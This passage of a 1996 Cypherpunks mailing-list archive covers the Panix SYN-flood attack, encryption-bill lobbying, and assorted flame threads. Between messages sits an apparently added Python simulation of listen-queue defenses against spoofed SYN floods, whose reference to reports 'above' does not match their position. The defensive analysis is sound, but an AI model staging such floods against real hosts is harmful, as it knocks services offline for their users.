(FBI director Louis Freeh made similar, though less straightforward, comments during Senate hearings in July.) Before Congress adjourns for the fall recess, the House must decide whether to approve a "digital telephony" domestic wiretapping slush fund into which the NSA and CIA can pour cash. Senators will then likely add provisions for warrantless wiretaps to the anti-terrorism bill that the House sent to them in August. The fundamental problem here is, of course, the politics of terrorism. Legislators routinely grandstand atop national tragedies, using victims and their families as backdrops. Justice Department lobbyists then swarm onto Capitol Hill and demand reduced civil liberties in the name of fighting terrorism. Societies can, and should, safeguard against systematic threats. Random acts of violence, on the other hand, are trickier to forestall - and terrorist acts are anything but predictable. Luckily for the EFF's Gilmore, he was cited only for the crime of "delaying/obstructing a peace officer" and was released after being handcuffed to a bench and then dumped in a holding cell for a few hours. He got off easy. But if Congress decides to sacrifice freedom for security, the country will ultimately enjoy neither. ### From smith at sctc.com Thu Sep 12 14:36:12 1996 From: smith at sctc.com (Rick Smith) Date: Fri, 13 Sep 1996 05:36:12 +0800 Subject: (Correction) Child Porn as Thoughtcrime Message-ID: <199609121758.MAA27427@shade.sctc.com> I wrote: : I've read in several places that the Jock Sturges case was thrown out : Nobody has dragged me away in shackles for : owning "Radiant Images." Correction -- That's "Radiant Identities." Rick. 
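The Panix reports above describe up to 150 connection requests a second carrying fake source addresses. As an added illustration (not code from any poster or from Panix), this constructed simulation compares a small listen backlog with a separate table of compact half-open entries sized to rate times timeout; the 75-second timeout, the backlog of 8 and the client timing are assumptions.

```python
"""Constructed simulation: forged-source SYN flood against two listen-queue designs."""
from collections import OrderedDict

TICKS_PER_SEC = 300      # simulation resolution; forged SYNs arrive on every even tick
SYN_RATE = 150           # forged SYNs per second, the rate quoted in the report
HALF_OPEN_TIMEOUT = 75   # seconds an unanswered SYN is kept (assumed value)
RTT_TICKS = 60           # a real client ACKs the SYN-ACK 0.2 s later (assumed)
LEGIT_IP = 0xC000020A    # 192.0.2.10, a documentation address for the real client


class HalfOpenTable:
    """Connections that sent a SYN but have not yet ACKed our SYN-ACK."""

    def __init__(self, capacity, timeout_ticks):
        self.capacity = capacity
        self.timeout = timeout_ticks
        self.entries = OrderedDict()   # (addr, port) -> arrival tick, oldest first
        self.peak = 0
        self.dropped = 0

    def _expire(self, now):
        # Arrival ticks only increase, so expired entries are always at the front.
        while self.entries:
            _, born = next(iter(self.entries.items()))
            if now - born < self.timeout:
                break
            self.entries.popitem(last=False)

    def on_syn(self, key, now):
        """Return True if the SYN was recorded, False if it had to be dropped."""
        self._expire(now)
        if key in self.entries:        # retransmitted SYN, already tracked
            return True
        if len(self.entries) >= self.capacity:
            self.dropped += 1
            return False
        self.entries[key] = now
        self.peak = max(self.peak, len(self.entries))
        return True

    def on_ack(self, key, now):
        """Return True if the handshake completes (entry still present)."""
        self._expire(now)
        return self.entries.pop(key, None) is not None


def forged_source(i):
    """Deterministic stand-in for a random spoofed (address, port) pair."""
    return ((i * 2654435761) % 2**32, 1024 + i % 30000)


def required_entries(rate, timeout_s, headroom=64):
    """Table size that cannot fill: SYNs arriving during one timeout, plus slack."""
    return rate * timeout_s + headroom


def simulate(capacity, seconds=120):
    """Run the flood plus one real client per second; report what got through."""
    table = HalfOpenTable(capacity, HALF_OPEN_TIMEOUT * TICKS_PER_SEC)
    pending_acks = {}                  # tick -> key of the real client ACKing then
    attempts = established = 0
    for tick in range(seconds * TICKS_PER_SEC):
        key = pending_acks.pop(tick, None)
        if key is not None and table.on_ack(key, tick):
            established += 1
        if tick % 2 == 0:              # forged SYN; its SYN-ACK is never answered
            table.on_syn(forged_source(tick // 2), tick)
        elif tick % TICKS_PER_SEC == 1 and tick > 1:   # real client, once a second
            key = (LEGIT_IP, 40000 + attempts)
            attempts += 1
            if table.on_syn(key, tick):
                pending_acks[tick + RTT_TICKS] = key
    return {"attempts": attempts, "established": established,
            "peak": table.peak, "dropped": table.dropped}


if __name__ == "__main__":
    designs = (("backlog of 8", 8),
               ("sized half-open table", required_entries(SYN_RATE, HALF_OPEN_TIMEOUT)))
    for name, capacity in designs:
        print(name, simulate(capacity))
```

With these assumed figures the sized table has to hold roughly 150 × 75 = 11,250 pending entries, which is the memory cost of absorbing the flood instead of dropping real clients.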
From frissell at panix.com Thu Sep 12 14:55:20 1996 From: frissell at panix.com (Duncan Frissell) Date: Fri, 13 Sep 1996 05:55:20 +0800 Subject: PANIX.COM down: denial of service attack Message-ID: <2.2.32.19960912182630.008b6324@panix.com> Here are the gory details from the first MOTD last Saturday: The attacker is forging random source addresses on his packets, so there is no way to find his/her location. There is also no way to screen out those packets with a simple router filter. This is probably the most deadly type of denial-of-service attack possible. There is no easy or quick way of dealing with it. If it continues into Saturday we will start working on kernel modifications to try to absorb the damage (since there's absolutely no way to avoid it). This however will not be an easy job and it could take days to get done (and get done right). For those who are IP hackers, the problem is that we're being flooded with SYNs from random IP addresses on our smtp ports. We are getting on average 150 packets per second (50 per host). We are not the only site being attacked in this way. I know of one other site that is being attacked in an identical manner right now, and I know of three others that have been attacked in the last two weeks. I hope that this means that the attacker is merely playing malicious games, and will soon tire of molesting our site. If that is the case, mail will come back up as soon as the attack ends. But if the attacker is really interested in damaging Panix specifically, the attack may *never* stop and service won't be restored until we can write kernel modifications. Since then the packet streams have hit almost all the ports for news, www, telnet, etc. DCF From talon57 at well.com Thu Sep 12 14:55:55 1996 From: talon57 at well.com (Brian D Williams) Date: Fri, 13 Sep 1996 05:55:55 +0800 Subject: [BOOK] "Competitive Intelligence" corrected Message-ID: <199609121612.JAA25760@well.com> Sorry, forgot the Author... 
Brian
"Car Bombs- The poor man's cruise missile."

Competitive Intelligence
Larry Kahaner
"From Black Ops to Boardrooms- How Businesses Gather, Analyze, and use Information to Succeed in the Global Marketplace."
ISBN 0-684-81074-3 Simon and Schuster ($24.00)

Preface: Being a Hero and not a Bum

Part One: What is Competitive Intelligence?
1.) The Rise of Competitive Intelligence
2.) What Competitive Intelligence can do for your company: Information vs Intelligence
3.) Why most managers are still stuck in the information age

Part Two: Real-World Competitive Intelligence
4.) The Intelligence Cycle
5.) Planning and Direction
6.) Collection
7.) Analysis
8.) Dissemination
9.) Mergers and Acquisitions
10.) Benchmarking and Competitive Intelligence
11.) How the Japanese Perform Competitive Intelligence
12.) Competitive Intelligence in other Countries
13.) Building a Competitive Intelligence System

Part Three: Issues, Opportunities, and the Future
14.) Justifying the cost of Competitive Intelligence
15.) Using Competitive Intelligence in the European Union
16.) Ethics
17.) The New Gatekeepers
18.) Why the U.S. Government must get involved in Competitive Intelligence
19.) Competitive Intelligence-The Next Generation

Glossary of Competitive Intelligence

From paul at fatmans.demon.co.uk Thu Sep 12 15:07:52 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Fri, 13 Sep 1996 06:07:52 +0800 Subject: ... subversive leftists Message-ID: <842550019.23167.0@fatmans.demon.co.uk> > tcmay at got.net (Timothy C. May) writes: > > As to "tasteless and insulting," a matter of personal perspective. I find > > it helpful to call a spade a spade, and others apparently do as well. > > > > Of course, Tim gets very uncomfortable when others call a spade a spade.
This constant character assasination of Tim is getting rather boring, as far as I can see, and I read all of the posts on the list, he has done nothing more than ignore posts from these idiots, that is his choice and nothing to do with anyone else. This whole thread is taking up too much space and is just totally pointless. lets call it a day and just agree to differ eh? Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From frantz at netcom.com Thu Sep 12 15:14:08 1996 From: frantz at netcom.com (Bill Frantz) Date: Fri, 13 Sep 1996 06:14:08 +0800 Subject: Fear of Flying -- from HotWired Message-ID: <199609121900.MAA03286@netcom8.netcom.com> At 1:16 PM 9/12/96 -0500, Declan McCullagh quoted: >... former CIA director James Woolsey: responded with some seemingly > gratuitous anti-Net > rhetoric. Terrorists may use biological weapons like anthrax, he said. > "Anthrax is colorless, odorless, and has a 90 percent lethality. One > gram has 100 million lethal doses." Then Woolsey delivered the zinger: > "The knowledge of how to make anthrax is widely available, including > on the Internet." Gee, biotech has come a long way. Now I can download the Anthrax DNA sequence from the net and insert it in some carrier bacteria and start making Anthrax bacteria. Neat! Or did he mean I can chemically synthesize Anthrax toxin? Or did he mean I can get information on culturing bacteria on the net, but must obtain a sample of the bacteria from other sources? 
BTW - My dictionary says that Anthrax is primarily an animal disease which only occasionally infects humans. It sounds like a poor choice for bio-war terror. ------------------------------------------------------------------------- Bill Frantz | "Lone Star" - My personal | Periwinkle -- Consulting (408)356-8506 | choice for best movie of | 16345 Englewood Ave. frantz at netcom.com | 1996 | Los Gatos, CA 95032, USA From EALLENSMITH at ocelot.Rutgers.EDU Thu Sep 12 15:22:15 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Fri, 13 Sep 1996 06:22:15 +0800 Subject: Excite Live! Message-ID: <01I9EA0TKKDS9ULOQC@mbcl.rutgers.edu> From: IN%"live at excite.com" 11-SEP-1996 22:14:03.06 >A request was made for the location of your Excite Live! page >Found your Excite Live at URL >http://live.excite.com/?uid=CEC8C99632372D6E Hi. As you can see from the above, I've set up an Excite Live! page with the email address of cypherpunks at toad.com. It has top priority on things related to cypherpunks, including technology news, political news, international news, etcetera, plus some built-in links and searches to appropriate places. I'd advise using the anonymizer to access the above link (http://www.anonymizer.com:8080/http://live.excite.com/?uid=). -Allen From ses at tipper.oit.unc.edu Thu Sep 12 15:24:31 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Fri, 13 Sep 1996 06:24:31 +0800 Subject: Panix attack In-Reply-To: <199609121743.RAA13735@pipe3.t1.usa.pipeline.com> Message-ID: On Thu, 12 Sep 1996, John Young wrote: > WSJ and WaPo have reports on Panix-jamming by info-request bombardment, and > Bell Labs security expert Bill Cheswick's attempt to solve it. This particular attack has been known for some time; kind of surprising it hasn't been used before. It is defensible, but it can take a lot of memory to give full protection.
The best IPV4 way I know of to stop the listen queue being filled is to use a special structure to hold half-open incoming connections, and not allocate the full TCB until the ack of the syn-ack comes in; that way, the listen queue can be made large enough to keep enough connections to cover the number of SYNS receivable before the half-open connection times out. This ensures that there's at least a traceable return address for the connection. Sort of like Photuris cookies but without the forced RTT delay (The timeout was added to most stacks in 94 after backbone fuckups caused queues to wedge on most of the big web servers with all sorts of asymmetric routing problems. It's not strictly legal TCP) ---- Cause maybe (maybe) | In my mind I'm going to Carolina you're gonna be the one that saves me | - back in Chapel Hill May 16th. And after all | Email address remains unchanged You're my firewall - | ........First in Usenet......... From shabbir at vtw.org Thu Sep 12 15:48:08 1996 From: shabbir at vtw.org (Voters Telecommunications Watch) Date: Fri, 13 Sep 1996 06:48:08 +0800 Subject: ALERT: S.1726 vote postponed; keep calling! Offices are swamped! (9/11/96) Message-ID: <199609121839.OAA09646@panix3.panix.com> ======================================================================== SENATE COMMERCE COMMITTEE VOTE POSTPONED SENATOR BURNS ENCLOSES LETTER OF COMMITMENT TO CRYPTO WE CONTINUE TO RECEIVE REPORTS OF "HEAVY CALLS" TO OFFICES. KEEP THE PRESSURE UP! WE'RE HOLDING OUR OWN!
September 12, 1996 Please widely redistribute this document with this banner intact until September 30, 1996 ________________________________________________________________________ CONTENTS The Latest News What You Can Do Now Background / What To Expect This Week Description of S.1726, Pro-CODE Bill Chronology of Pro-Crypto Legislation For More Information / Supporting Organizations ________________________________________________________________________ THE LATEST NEWS The Senate Commerce Committee vote on S.1726 (Pro-CODE) originally set for today (Thursday 9/12) has been postponed. We have been told that the change was largely due to committee scheduling issues, and the Committee staff and have indicated that they are still committeed to marking up S. 1726 within the next. More information should be available shortly. Senator Conrad Burns (R-MT), co-author of S. 1726, asked us to forward the following note to the net.community: X-POP3-Rcpt: jseiger at mailserver From: Conrad_Burns at burns.senate.gov Date: Thu, 12 Sep 96 09:55:35 EST To: jseiger at cdt.org Subject: Open Letter to the Internet from Senator Burns The Commerce Committee markup on Pro-CODE, S. 1726, that we had expected to have held on Thursday, September 12 has been postponed. I am fully committed to taking Pro-CODE to markup, out of committee and onto the floor of the Senate in this Congress. I believe that this legislation is vital to ensuring the continued strength of America's high-tech community and the privacy of its citizens. I would like to thank the many thousands of Netizens who have expressed their support for Pro-CODE. Sincerely, U.S. Senator Conrad Burns It is critical to keep your phone calls and faxes coming into the offices of the Committee members listed below. Based on the feedback we are receiving from callers and conversations with Capitol Hill staff, the response from the Net has been strong and continuous. 
Thank you to all who have taken the time to call Congress to voice your support for encryption policy reform. If you have not yet done so, please take a moment to call the committee members below. If you have a little extra time on your hands, between now and the middle of next week please make an effort to call all the Senators on the list below.

Your help and support is critical to the future of privacy and security on the Internet.

Finally, please don't forget to sign the petition in support of Encryption Policy Reform -- http://www.crypto.com/petition/. More than 4000 Netizens have already signed, including encryption experts Phil Zimmermann, Matt Blaze, Phil Karn, and others.
________________________________________________________________________
WHAT YOU CAN DO NOW

It's crucial that you call the Commerce committee members below and urge them to pass S.1726 out of committee without amendments. (This is also known as a "clean" bill.) Any opportunity for amendments (even if they are good) opens us up to the possibility of hostile amendments that could restrict the use of encryption even further than today's abysmal state. It could even prohibit the use of encryption without Clipper Chip-like key 'escrow' technology, which includes built-in surveillance and monitoring functionality.

1. Call/Fax the members of the Senate Commerce committee and urge them to pass S.1726 out of committee "cleanly". Do not use email, as it is not likely to be looked at in time to make a difference. Use the sample communique and directory listing below to make it a simple TWO MINUTE task.

2. Sign the petition to support strong encryption at http://www.crypto.com/petition/ ! Join other cyber-heroes as Phil Zimmermann, Matt Blaze, Bruce Schneier, Vince Cate, Phil Karn, and others who have also signed.

3. Over the next 7 days, it is crucial that you call all these members of the Senate Commerce Committee.
   P ST Name and Address            Phone           Fax
   = == ========================    ==============  ==============
   D SC Hollings, Ernest F.         1-202-224-6121  1-202-224-4293
   D MA Kerry, John F.              1-202-224-2742  1-202-224-8525
   D HI Inouye, Daniel K.           1-202-224-3934  1-202-224-6747
   D KY Ford, Wendell H.            1-202-224-4343  1-202-224-0046
   D WV Rockefeller, John D.        1-202-224-6472  1-202-224-7665
   D LA Breaux, John B.             1-202-224-4623  1-202-228-2577
   D NV Bryan, Richard H.           1-202-224-6244  1-202-224-1867
   D ND Dorgan, Byron L.            1-202-224-2551  1-202-224-1193
   D NE Exon, J. J.                 1-202-224-4224  1-202-224-5213
   D OR Wyden, Ron*                 1-202-224-5244  1-202-228-2717
   R SD Pressler, Larry*            1-202-224-5842  1-202-224-1259
   R MT Burns, Conrad R.(*sponsor)  1-202-224-2644  1-202-224-8594
   R AK Stevens, Ted                1-202-224-3004  1-202-224-2354
   R AZ McCain, John*               1-202-224-2235  1-202-228-2862
   R WA Gorton, Slade               1-202-224-3441  1-202-224-9393
   R MS Lott, Trent*                1-202-224-6253  1-202-224-2262
   R TX Hutchison, Kay Bailey       1-202-224-5922  1-202-224-0776
   R ME Snowe, Olympia              1-202-224-5344  1-202-224-1946
   R MO Ashcroft, John*             1-202-224-6154  1-202-228-0998
   R TN Frist, Bill                 1-202-224-3344  1-202-228-1264
   R MI Abraham, Spencer            1-202-224-4822  1-202-224-8834

   * supporter or cosponsor. The bill also enjoys broad bi-partisan support from members not on the committee including Senators Leahy (D-VT) and Murray (D-WA).

4. Here is a sample conversation:

   SAMPLE PHONE CALL

       You:
       Sen:Hello, Senator Mojo's office!
       You:
   SAY    I'm calling to urge the Senator to pass S.1726, the Burns, Leahy,
   THIS-> Pressler bill at the upcoming Commerce Committee Markup. The bill
          is critical to the future of privacy, security, and electronic
          commerce on the internet.
       Sen:Ok, thanks!

   IF THEY SAY "The Senator has concerns about the bill", please answer, "Please try to work these issues out as it moves to the Senate floor, but passage out of committee will send an important signal to the Administration."

5. To help us measure the effectiveness of the campaign, WE NEED TO HEAR FROM YOU.
Please tell us who you called, and how they sounded. We'll be passing this information to folks in D.C. who can help apply pressure where needed.

        $ Mail vtw at vtw.org
        Subject: I called so-and-so

        Hey, I called Sen. Mojo. He sounded iffy, call in the reinforcements.
        ^D

6. Forward this to your friends and colleagues in appropriate forums until the date of expiration at the top. Forward a copy of this to your Internet Service Provider as well, and ask them to put the following text in their message of the day (motd), or on their WWW page:

        ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT
        The U.S. Senate will be voting on a proposal to encourage better
        security on the Internet soon. Your help is needed to call Congress.
        See http://www.crypto.com/ for more details.
        ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT
________________________________________________________________________
BACKGROUND / WHAT TO EXPECT THIS WEEK

For the past 3 years, Cyber-Rights Activists, citizens, and industry leaders have been working hard to reform US encryption policy.

Support has been building behind several legislative proposals this year because they send a clear signal to the Administration about the need for security and privacy in the Information Age. The digital revolution is currently being held hostage by the White House's Cold War restrictions on privacy-enhancing encryption technology.

Now, with Congress less than a month away from adjournment, everyone who supports encryption and privacy is working to see this bill leave committee in order to send a clear message to the White House that they are on the wrong side of the encryption issue.
Although this bill may not become law this year, its passage out of committee will be a landmark event that will clearly tell the White House that the Congress, the public, and the computer industry care about security and privacy, and need strong, reliable encryption technology in order to make the Internet a viable platform for commerce, education, and democracy.

Success for our side is not certain, and the next week is not without risks. On September 12th (or sometime soon after), the Senate Commerce committee is expected to hold a "markup", where the bill is examined, voted on, and if there are enough votes, passed out of committee. Two things could happen:

        -the committee could pass the bill as written,
        -the committee could pass the bill with amendments.

Any amendments are not likely to be friendly, and in particular, quiet sources have told privacy activists that the Clinton Administration has been readying a legislative assault on your right to use encryption for several weeks now. A Clipper-like amendment could be attached to the bill if our side does not have enough votes to block all amendments.

It is crucial that all netizens who consider privacy and security important take a moment to call members of the Commerce Committee right now and urge them to vote S.1726 out of committee without amendments.
________________________________________________________________________
DESCRIPTION OF S.1726, PRO-CODE BILL

Privacy-enhancing encryption technology is currently under heavy restrictions kept in place by the White House. Encryption that is currently allowed to be exported is not sufficient to protect confidential information. This policy acquires an "Alice-in-Wonderland" quality when one realizes that strong encryption products are available abroad both for sale and for free download off the Internet.

The Pro-CODE Act resolves to:

1. Allow for the *unrestricted* export of "mass-market" or "public-domain" encryption programs, including such products as Pretty Good Privacy and popular World Wide Web browsers.

2. Requires the Secretary of Commerce to allow the less restricted export of other encryption technologies if products of similar strength are generally available outside the United States, roughly up to DES strength.

3. Prohibits the federal government from imposing mandatory key-escrow encryption policies on the domestic market and limiting the authority of the Secretary of Commerce to set standards for encryption products.
________________________________________________________________________
CHRONOLOGY OF PRO-CRYPTO LEGISLATION

9/12/96 (scheduled) Senate Commerce committee will hold markup of S.1726 and hopefully pass it out of committee with no amendments.

7/25/96: Full Senate Commerce committee holds positive hearings on S.1726. FBI Director Louis Freeh testifies along with many cyber-luminaries. Hearings are cybercast Internet Cyber-Rights activists with HotWired and WWW.Crypto.Com. You can see the photos, read the testimony, and listen to the audio transcript at http://www.crypto.com/events/072596/

6/26/96: Senate subcommittee holds positive hearings on S.1726. Hearings are cybercast Internet Cyber-Rights activists with HotWired and WWW.Crypto.Com. You can see the photos, read the testimony, and listen to the audio transcript at http://www.crypto.com/events/062696/

5/2/96: Bi-partisan group of Senators introduce Pro-CODE Act, which would free public-domain encryption software (such as PGP) for export, free much commercial encryption for export, and reduce the government's ability to push Clipper proposals down the throats of an unwilling public. Original sponsors include: Senators Burns (R-MT), Dole (R-KS), Faircloth (R-NC), Leahy (D-VT), Murray (D-WA), Pressler (R-SD), and Wyden (D-OR).

3/5/96: Sen. Leahy (D-VT) and Rep. Goodlatte (R-VA) announce encryption bills (S.1587/H.R.3011) that significantly relax export restrictions on products with encryption functionality in them, as well as free public domain software such as PGP (Pretty Good Privacy).
________________________________________________________________________
FOR MORE INFORMATION / SUPPORTING ORGANIZATIONS

There are many excellent resources online to get up to speed on crypto including the following WWW sites:

        http://www.crypto.com
        http://www.privacy.org
        http://www.eff.org
        http://www.cdt.org
        http://www.epic.org
        http://www.vtw.org

Please visit them often.

The following organizations have signed onto this alert:

        American Civil Liberties Union
        Center for Democracy and Technology
        Electronic Frontier Foundation
        Electronic Privacy Information Center
        Voters Telecommunications Watch
________________________________________________________________________
End alert
========================================================================

From robert at precipice.v-site.net Thu Sep 12 15:58:09 1996
From: robert at precipice.v-site.net (HipCrime)
Date: Fri, 13 Sep 1996 06:58:09 +0800
Subject: mailing lists
In-Reply-To: <323850BF.B46@precipice.v-site.net>
Message-ID: <3238648F.207@precipice.v-site.net>

>i don't see you sticking your neck out to deal with assholes who think
>freedom of speech is secondary to their right not to ever see mail
>they don't want.

Like hell we're not. What are you guys mad at us for? Thinking that FREEDOM of SPEECH is much, much more important than whining computer nerds who can't push a DELETE button.

>i did competitive public speaking from 7th grade until my junior year
>of high school where i was also on the debate team for two years.

In that case, maybe you should learn to use the SHIFT key. Or didn't debaters in your school take typing and/or learn about punctuation, capitalization, and the other niceties of English communication?
>now i make a living as a biochemistry grad student (only a year left
>until you get to call me Dr.) where logic is paramount and feelings
>are irrelevant.

Well, "doctor" why can't you see (with your logic) that junk Email (or "spam") would save many, many forests if it REPLACED junk SnailMail.

Isn't it just that your "irrelevant feelings" have been hurt, because someone used your remailer-baby in a way you hadn't planned for ?!?

Why not put your money where your mouth is, and bet me (any amount), that spam WILL be socially acceptable by the year 2000. Particularly, when the green-folks discover how many trees will be saved. It'll be a social-mandate, NOT just a suggestion.

Want to bet?

-- HTTP://www.HIPCRIME.com

From rah at shipwright.com Thu Sep 12 16:04:26 1996
From: rah at shipwright.com (Robert Hettinga)
Date: Fri, 13 Sep 1996 07:04:26 +0800
Subject: J'accuse!: Whitehouse and NSA vs. Panix and VTW
Message-ID:

I think someone should just stand right up and accuse the NSA, at the behest of the Whitehouse, of running a denial of service attack on Panix at *exactly* the time when VTW is lobbying its hardest on the PRO-CODE bill.

Ooops. I just did.... ;-)

None *dare* call it conspiracy,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
 -- Punishment, 100 times on a chalkboard, for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/

From perry at piermont.com Thu Sep 12 16:12:29 1996
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 13 Sep 1996 07:12:29 +0800
Subject: Panix attack
In-Reply-To:
Message-ID: <199609122021.QAA07296@jekyll.piermont.com>

Simon Spero writes:
> This ensures that there's at least a traceable return address for the
> connection. Sort of like photuris cookies but without the forced RTT delay

Not really. The genius of the Photuris cookie is that it induces no state at all in the responder, thanks to crypto tricks.
I agree, though, that you can harden hosts against TCP floods.

Perry

From dlv at bwalk.dm.com Thu Sep 12 16:19:38 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 13 Sep 1996 07:19:38 +0800
Subject: Kook Of The Month
In-Reply-To: <199609121549.RAA06613@spoof.bart.nl>
Message-ID:

>From remailer at mailhub.bart.nl Thu Sep 12 11:48:50 1996
Received: by bwalk.dm.com (1.65/waf) via UUCP; Thu, 12 Sep 96 13:14:35 EDT for dlv
Received: from [194.158.160.11] by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA27439 for dlv at bwalk.dm.com; Thu, 12 Sep 96 11:48:50 -0400
Received: (from remailer at localhost) by spoof.bart.nl (8.7.5/8.6.8) id RAA06613 for dlv at bwalk.dm.com; Thu, 12 Sep 1996 17:49:57 +0200 (MET DST)
Date: Thu, 12 Sep 1996 17:49:57 +0200 (MET DST)
Message-Id: <199609121549.RAA06613 at spoof.bart.nl>
To: dlv at bwalk.dm.com
From: remailer at 2005.bart.nl (Anonymous)
Comments: Please report misuse of this automated remailing service to
        The contents of this message are neither approved or condoned by nl.com or our host bART Internet.
        *** Replying to it will not send your reply to the sender ***
        There is no way to determine the originator of this message.
        If you wish to be blocked from receiving all anonymous mail, send your request to the mailing list.
        The operator of this particular remailer can be reached at
Subject: Kook Of The Month

Eat this Dr. Scum Bag

Return-Path:
To: stewarts at ix.netcom.com
Cc: postmaster at netcom.com, abuse at netcom.com, security at netcom.com
Subject: Unsolicited harrassing e-mail from
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 11 Sep 96 21:37:09 EDT
Sender: owner-cypherpunks at toad.com

Please stop e-mailing me, cc:ing me, or otherwise harassing me. I have no connection with the thread you're quoting and don't want to receive any more e-mail from you.
stewarts at ix.netcom.com writes:
> >> There
> >> are a number of anonymous remailers out in cyberspace, but it has been
> >> stated by a knowledgeable source that a number of them are being operated
> >> by law enforcement agencies (presumably to troll for criminal activity). A
> >
> >Can someone verify/discredit/comment on this statement? Who is the
> >knowledgeable source?
>
> Definitely true. Zero is a number, and there are also larger numbers.
> KOTM = Kook Of The Month.
>
> # Thanks; Bill
> # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
> #
> # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto
>

From rah at shipwright.com Thu Sep 12 16:22:30 1996
From: rah at shipwright.com (Robert Hettinga)
Date: Fri, 13 Sep 1996 07:22:30 +0800
Subject: Sen. Burns' statement on postponement of Crypto vote today.
Message-ID:

--- begin forwarded text

Date: Thu, 12 Sep 1996 15:30:19 -0400
To: 1e$pam
From: Robert Hettinga
Subject: Re: Sen. Burns' statement on postponement of Crypto vote today.
Cc:
Bcc:
X-Attachments:

--- begin forwarded text

From: somebody
Date: Thu, 12 Sep 1996 15:03:21 -0400
To: rah at shipwright.com
Subject: Re: Sen. Burns' statement on postponement of Crypto vote today.

Robert--

My sources indicate that no markup will be held on the Burns bill before Congress adjourns for year. Not clear the votes were there, plus the Administration had Dems lined up to offer weakening amendments. Also, the hearing scheduled yesterday in House Judiciary for its counterpart bill was postponed until Sept. 25; that is 3 days prior to adjournment target, and I wouldn't be surprised if it never takes place. In other words, most likely prospect is for no action -- not even favorable reporting by a Cmte. -- before Congress goes home.
Administration in next two weeks will unveil its "new and improved" encryption policy, which will likely offer a shift in licensing to Commerce Dept., and gradual easing of exportable strength, in exchange for industry-funded key escrow management demo projects. And that's the way it is (Political reality is not optional).

You can pass this info. along, as long as you do not attribute it to me.

--- end forwarded text

--- end forwarded text

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
 -- Punishment, 100 times on a chalkboard, for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/

From frissell at panix.com Thu Sep 12 16:46:29 1996
From: frissell at panix.com (Duncan Frissell)
Date: Fri, 13 Sep 1996 07:46:29 +0800
Subject: Informal Renegotiation of the Law
Message-ID: <2.2.32.19960912204730.006977ac@panix.com>

Many people on this list and in the larger world focus on laws and regulations and sometimes act as if that is the only way that the relative rights and duties of governments and civilians are established. In fact, there is a lot of informal negotiation going on all the time. This is significant because an unenforced law isn't a law at all.

For example, you will not read anywhere that compulsory education laws have been repealed -- but they have. When the home schooling movement started in the late 1970s, there were occasional harassment and prosecution of parents. The home schoolers won some and lost some. As time went on, the authorities came to accept home schoolers so that at this point, legal problems are rare. Compulsory education has been effectively repealed by the actions of refusenicks in both the subject population and the enforcement population.
This same process will occur more frequently in the future as libertarian memes spread, government enforcement resources shrink, and people's vastly different attitudes as to what should be legal and illegal make a monopoly legal regime impossible to keep in place.

Note that unlicensed immigration is against the law. Note that some websites post material that others would like banned. Maybe you can deport a few or ban a few. But how many? If you have three million illegal aliens or 3 million individual ISPs (people with high speed connections running their own sites) you can't deport them or shut them down because it simply takes too much time and too many enforcement resources. The authorities give up. You get de facto open immigration and a de facto unregulated Net.

Coercion is expensive and slow. Free exchange is cheap and fast. That's why free exchange wins in the long run.

It's not a victory without losses. Some people are busted. Some sites are shut down. You don't go into battle expecting zero casualties. But what counts in the end is who wins. And we've got them outnumbered by far.

DCF

"So you think you can handle 3 million sites? Wait a few years and you can try to handle 300 million."

From joelm at eskimo.com Thu Sep 12 16:48:34 1996
From: joelm at eskimo.com (Joel McNamara)
Date: Fri, 13 Sep 1996 07:48:34 +0800
Subject: CryptLib CAPI for VB
Message-ID: <3.0b11.32.19960912140334.0069ea08@mail.eskimo.com>

A non-text attachment was scrubbed...
Name: not available
Type: text/enriched
Size: 340 bytes
Desc: not available
URL:

From adam at homeport.org Thu Sep 12 17:00:52 1996
From: adam at homeport.org (Adam Shostack)
Date: Fri, 13 Sep 1996 08:00:52 +0800
Subject: ISODE Consortium X.509 Certification system
In-Reply-To: <3.0b11.32.19960912105914.0054f7b0@cybercash.com>
Message-ID: <199609122208.RAA06798@homeport.org>

Don't forget there are security vulnerabilities in X.509v3.
Ross Anderson's 'Robustness Principles' paper discusses the weakness of sign after encrypting. In the Crypto '95 proceedings, or on his web site.

Adam

Carl Ellison wrote:
| It really bothers me whenever I see someone mouthing platitudes
| about certificates, like:
|
| >The ITU-T, through X.509, recommend strong authentication based on public
| >key cryptosystems as the basis for providing secure services. The ISODE
| >Consortium uses X.509 as the core of its security strategy.
| >X.509 provides a flexible, scaleable and manageable algorithm-independent
| >authentication infrastructure, which can be used as the basis for a wide
| >range of security services such as message encryption and access control.
|
| Fact is, identity certification (which is what X.509 gives) is neither
| necessary nor sufficient for providing secure services -- and there's
| nothing magic about X.509.
|
| There are marketeers, however, who want the world to believe that the
| generation and use of X.509 certs will somehow give you security -- so they
